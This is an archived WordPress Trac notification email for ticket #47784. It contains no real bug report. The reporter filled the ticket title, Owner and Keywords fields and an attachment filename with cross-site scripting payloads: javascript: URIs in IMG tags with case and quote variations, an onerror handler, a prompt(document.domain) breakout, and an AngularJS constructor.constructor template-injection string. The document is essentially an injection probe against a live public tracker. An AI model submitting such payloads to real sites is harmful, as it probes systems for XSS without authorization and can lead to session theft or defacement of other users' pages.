[wp-trac] [WordPress Trac] #47784: <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert(‘XSS’)> <img src=xss onerror=alert(1)>

WordPress Trac noreply at wordpress.org
Fri Jul 26 17:59:41 UTC 2019


#47784: <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG
SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(‘XSS’)>
<img src=xss onerror=alert(1)>
-------------------------------------+-------------------------------------
 Reporter:  harry008                 |       Owner:
                                     |  {{constructor.constructor('alert(document.domain)')()}}
     Type:  enhancement              |      Status:  assigned
 Priority:  normal                   |   Milestone:  Awaiting Review
Component:  General                  |     Version:  5.2.2
 Severity:  normal                   |  Resolution:
 Keywords:  has-patch<IMG            |     Focuses:
  SRC=jAVasCrIPt:alert(‘XSS’)> <IMG  |
  SRC=”javascript:alert(‘XSS’);”>    |
  <IMG                               |
  SRC=javascript:alert("XSS")>|
  <IMG SRC=javascript:alert(‘XSS’)>  |
  <img src=xss onerror=alert(1)>     |
-------------------------------------+-------------------------------------
Changes (by harry008):

 * Attachment "“> <img src = x onerror = prompt (document.domain)>.jpg"
 added.

 {{constructor.constructor('alert(document.domain)')()}}

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47784>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform


More information about the wp-trac mailing list